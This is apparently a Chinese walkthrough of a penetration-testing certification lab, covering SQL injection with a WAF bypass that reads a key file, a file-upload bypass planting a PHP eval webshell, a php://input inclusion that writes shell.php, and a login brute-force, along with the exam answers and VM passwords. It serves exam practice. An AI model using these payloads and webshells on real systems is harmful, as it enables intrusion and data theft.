CSIP-FTE考试专业题

靶场下载链接: https://pan.baidu.com/s/1ce1Kk0hSYlxrUoRTnNsiKA?pwd=ha1x

pte-2003密码:admin123     centos:root admin123    解压密码:  PTE考试专用

下载好后直接用vmware打开,有两个靶机,一个是基础题,还有个综合题。基础题是pte-centos6,综合题是pte-2003

打开基础题pte-centos6后用vim设置静态IP地址,虚拟机用net模式的话,就设置与你虚拟机同一个网段 vim /etc/sysconfig/network-scripts/ifcfg-eth0 设置好后reboot重启一下即可,然后访问81-85端口,共5题。因为靶场出了问题,只能打开第一题,建议按照原网络环境去设置仅主机模式,原IP地址是172.16.12.100,虚拟机中的攻击机也可以配置同网段仅主机模式即可,问题不大。pet-2003设置net模式就好了,发现用桥接模式扫描端口失败  

//临时关闭防火墙 service iptables stop

//禁止开机启动 chkconfig iptables off

基础题目之SQL注入

http://10.0.0.110:81/

进入答题 

1、利用order by获取查询列数信息 

 根据提示:select * from article where id= ('1');需闭合参数1')后插入sql查询语句 order by 4,后注释后面内容#

语句为: 1') order by 4#

填写空格会自动消除;mysql%0a是换行,可以代替空格;#url编码为%23

http://10.0.0.110:81/vulnerabilities/fu1.php?id=1%27)%0aorder%0aby%0a5%23

order by 5报错;(为查询是否有5个列)

http://10.0.0.110:81/vulnerabilities/fu1.php?id=1%27)%0aorder%0aby%0a4%23

order by 4显示内容;(证明article表有4个列) 

2、 联合查询探测回显数据

http://10.0.0.110:81/vulnerabilities/fu1.php?id=-1%27)%0aUNIunionON%0aselect%0a1,2,3,4%23

id=-1是尝试利用的一个注入点,通过传递一个非法的ID值来触发错误。

UNION注入:UNIunionON (union通过双写大小写绕过)

注入SQL查询:select 1,2,3,4%23

3、用load_file()函数【读取/tmp/360/key文件】

load_file()是MySQL中的一个内置函数,用于从服务器文件系统中读取文件内容

http://10.0.0.110:81/vulnerabilities/fu1.php?id=-1%27)%0aUNIunionON%0aselect%0a1,load_file(%27/tmp/360/key%27),3,4%23

select * from article where id= ('-1') UNION select 1,load_file('/tmp/360/key'),3,4#')

4、 成功获取key

key:8b3h4a7v

基础题目之文件上传突破

http://10.0.0.110:82/

 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。

    通过你所学到的知识,测试其过WAF滤规则,突破上传获取webshell,答案就在根目录下key.php文件中。

1、尝试上传正常照片

 2、照片插入写入一句话木马

使用【edjpgcom】工具插入一句话

<?php @eval($_POST['chopper']);?>

 3、bp抓包改后缀名为php3

后缀名写为php被拦截,改为php3特殊格式成功绕过(php2、php3、php4、phtml)

 4、蚁剑远程webshell

http://10.0.0.110:82/vulnerabilities/12.php3

5、成功获取key

key:8t5s0x5t

基础题目之文件包含

http://10.0.0.110:83/

    PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。

    通过你所学到的知识,测试该网站可能存在的包含漏洞,尝试获取webshell,答案就在根目录下key.php文件中。

进入答题:

http://10.0.0.110:83/vulnerabilities/fu1.php?file=view.html

1、读文件

http://10.0.0.110:83/vulnerabilities/fu1.php?file=php://filter/read=convert.base64-encode/resource=../key.php

  • php://filter: 是PHP中的一个输入流过滤器,允许在读取文件内容之前对其进行处理。
  • read=convert.base64-encode: 指定了过滤器的行为,即读取的内容将被转换为Base64编码。
  • resource=../key.php: 指定要读取的资源文件路径。这里的../表示上一级目录,意味着尝试访问当前目录的父目录下的key.php文件。

2、base64解码:

3、成功获取key

key:6u3x9t2p

 方式二:

 1、上传一句话木马

GET /vulnerabilities/fu1.php?file=php://input HTTP/1.1
Host: 10.0.0.110:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.0.0.110:83/vulnerabilities/fu1.php?file=page=php://filter/read=convert.base64-encode/resource=../key.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 67

<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>

2、 蚁剑webshell

http://10.0.0.110:83/vulnerabilities/shell.php

 

 3、成功获取key

key:6u3x9t2p

基础题目之日志分析

分析得知有大量访问adminlogin.php

发现有一个登录页面 

Bp抓包进行暴力破解,获得用户名和密码 

暴力破解到用户名和密码

用户名:admin   密码:password123

登录得到key

 成功获取key:9y6u8s5m


声明:

  • 此文章只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试留言私信,如有侵权请联系小编处理。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/44799.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【CTF-Crypto】数论基础-02

【CTF-Crypto】数论基础-02 文章目录 【CTF-Crypto】数论基础-021-16 二次剩余1-20 模p下-1的平方根*1-21 Legendre符号*1-22 Jacobi符号*2-1 群*2-2 群的性质2-3 阿贝尔群*2-4 子群2-11 群同态2-18 原根2-21 什么是环2-23 什么是域2-25 子环2-26 理想2-32 多项式环 1-16 二次剩…

打造智慧校园德育管理,提升学生操行基础分

智慧校园的德育管理系统内嵌的操行基础分功能&#xff0c;是对学生日常行为规范和道德素养进行量化评估的一个创新实践。该功能通过将抽象的道德品质转化为具体可量化的指标&#xff0c;如遵守纪律、尊师重道、团结协作、爱护环境及参与集体活动的积极性等&#xff0c;为每个学…

医疗器械FDA |FDA网络安全测试具体内容

医疗器械FDA网络安全测试的具体内容涵盖了多个方面&#xff0c;以确保医疗器械在网络环境中的安全性和合规性。以下是根据权威来源归纳的FDA网络安全测试的具体内容&#xff1a; 一、技术文件审查 网络安全计划&#xff1a;制造商需要提交网络安全计划&#xff0c;详细描述产…

Matlab【光伏预测】基于雪融优化算法SAO优化高斯过程回归GPR实现光伏多输入单输出预测附代码

% 光伏预测 - 基于SAO优化的GPR % 数据准备 % 假设有多个输入特征 X1, X2, …, Xn 和一个目标变量 Y % 假设数据已经存储在 X 和 Y 中&#xff0c;每个变量为矩阵&#xff0c;每行表示一个样本&#xff0c;每列表示一个特征 % 参数设置 numFeatures size(X, 2); % 输入特征的…

Spring Boot集成easyposter快速入门Demo

1.什么是easyposter&#xff1f; easyposter是一个简单的,便于扩展的绘制海报工具包 使用场景 在日常工作过程中&#xff0c;通常一些C端平台会伴随着海报生成与分享业务。因为随着移动互联网的迅猛发展&#xff0c;社交分享已成为我们日常生活的重要组成部分。海报分享作为…

visual studio 2019版下载以及与UE4虚幻引擎配置(过程记录)(官网无法下载visual studio 2019安装包)

一、概述 由于需要使用到UE4虚幻引擎&#xff0c;我使用的版本是4.27版本的&#xff0c;其官方默认的visual studio版本是2019版本的&#xff0c;相应的版本对应关系可以通过下面的官方网站对应关系查询。https://docs.unrealengine.com/4.27/zh-CN/ProductionPipelines/Develo…

MMSegmentation笔记

如何训练自制数据集&#xff1f; 首先需要在 mmsegmentation/mmseg/datasets 目录下创建一个自制数据集的配置文件&#xff0c;以我的苹果叶片病害分割数据集为例&#xff0c;创建了mmsegmentation/mmseg/datasets/appleleafseg.py 可以看到&#xff0c;这个配置文件主要定义…

python:使用matplotlib库绘制图像(四)

作者是跟着http://t.csdnimg.cn/4fVW0学习的&#xff0c;matplotlib系列文章是http://t.csdnimg.cn/4fVW0的自己学习过程中整理的详细说明版本&#xff0c;对小白更友好哦&#xff01; 四、条形图 1. 一个数据样本的条形图 条形图&#xff1a;常用于比较不同类别的数量或值&…

3dmax-vray5大常用材质设置方法

3dmax云渲染平台——渲染100 以高性价比著称&#xff0c;是预算有限的小伙伴首选。 15分钟0.2,60分钟内0.8;注册填邀请码【7788】可领30元礼包和免费渲染券 提供了多种机器配置选择(可以自行匹配环境)最高256G大内存机器&#xff0c;满足不同用户需求。 木纹材质 肌理调整&…

函数语意学(The Sematics of Function)

1、非静态成员函数转化为非成员函数 c 设计准则之一就是&#xff1a;非静态成员函数至少和非成员函数有相同的效率。 也就是说下面两个函数具有相同的效率&#xff1a; float magnitude(const Point3d * this){...}; float Point3d::magnitude(){...};以 float Point3d::mag…

练习9.5 彩票分析

练习 9.14&#xff1a;彩票 创建⼀个列表或元素&#xff0c;其中包含 10 个数和 5 个字 ⺟。从这个列表或元组中随机选择 4 个数或字⺟&#xff0c;并打印⼀条消息&#xff0c; 指出只要彩票上是这 4 个数或字⺟&#xff0c;就中⼤奖了。 练习 9.15&#xff1a;彩票分析 可以使…

面试题 05. 替换空格

05. 替换空格 题目描述示例 题解 题目描述 请实现一个函数&#xff0c;把字符串 s 中的每个空格替换成"%20"。 示例 示例1 输入&#xff1a;s “We are happy.” 输出&#xff1a;“We%20are%20happy.” 题解 class Solution { public:string replaceSpace(stri…

jQuery 元素选择器集合

jQuery 提供了一套非常强大的元素选择器&#xff0c;它们可以以各种方式定位和操作网页文档中的元素。 以下是 jQuery 中的一些常用选择器&#xff1a; 1、基本选择器 #id&#xff1a;选择 ID 为 id 的元素。.&#xff08;类选择器&#xff09;&#xff1a;选择具有特定类的…

2.5 OJ 网站的使用与作业全解

目录 1 OJ 网站如何使用 1.1 注册账户 1.2 登录账户 1.3 做题步骤 2 本节课的 OJ 作业说明 3 章节综合判断题 4 课时2作业1 5 课时2作业2 6 课时2作业3 1 OJ 网站如何使用 〇J 是英文 Online Judge 的缩写&#xff0c;中文翻译过来是在线判题。当用户将自己编写的代码…

基于XC7VX690T FPGA+ZU15EG SOC的6U VPX总线实时信号处理平台(支持4路光纤)

6U VPX架构&#xff0c;符合VITA46规范板载高性能FPGA处理器&#xff1a;XC7VX690T-2FFG1927I板载1片高性能MPSOC&#xff1a;XCZU15EG-2FFVB1156I板载1片MCU&#xff0c;进行健康管理、时钟配置等V7 FPGA外挂2个FMC接口两片FPGA之间通过高速GTH进行互联 基于6U VPX总线架构的通…

从零开始做题:神奇的棋盘

题目 打开得到一副adfgvx加密棋盘 观察txt数据只有1-5&#xff0c;猜测是数字字母坐标转换&#xff0c;用notepad批量操作一下 解题 AGAXXDAGGVGGVDVADAVXDGADVGDVAADDDDFXAFAFDGDVXXDGGDGGDXDDFDDXVGXADGVDFXVVAADDXDXXADDVGGGXGXXXXGXXGGXGDVVVGGGAGAAAAGAAGGAGDDDAGAGGG…

解释如单例、工厂、观察者等常见设计模式在Android开发中的应用。

在Android开发中&#xff0c;设计模式的应用是提升代码质量、增强可维护性和可扩展性的重要手段。单例模式&#xff08;Singleton&#xff09;、工厂模式&#xff08;Factory&#xff09;、观察者模式&#xff08;Observer&#xff09;等是其中最为常见且实用的设计模式。下面我…

如何对已经存在的表进行加分区方案分区函数

我参考网上的&#xff0c;写了2给存储过程&#xff0c;一个初始创建文分区方案分区函数&#xff1b;一个可以通过作业新增文件组文件件&#xff1b; 但是初始没有绑定表&#xff0c;网上的都是在创建表是绑定分区方案&#xff0c;但是我的表是已经存在的&#xff0c;怎么绑定 …

Python实现网站IP地址查询

使用socket库实现网站的ip地址查询&#xff0c;以便于使用CC攻击和DDoS攻击&#xff08;闹着玩的&#xff09; import socket def get_website_ip(website): try: ip socket.gethostbyname(website) return ip except socket.gaierror: retur…

最小数字游戏(Lc2974)——模拟+优先队列(小根堆)、排序+交换

你有一个下标从 0 开始、长度为 偶数 的整数数组 nums &#xff0c;同时还有一个空数组 arr 。Alice 和 Bob 决定玩一个游戏&#xff0c;游戏中每一轮 Alice 和 Bob 都会各自执行一次操作。游戏规则如下&#xff1a; 每一轮&#xff0c;Alice 先从 nums 中移除一个 最小 元素&…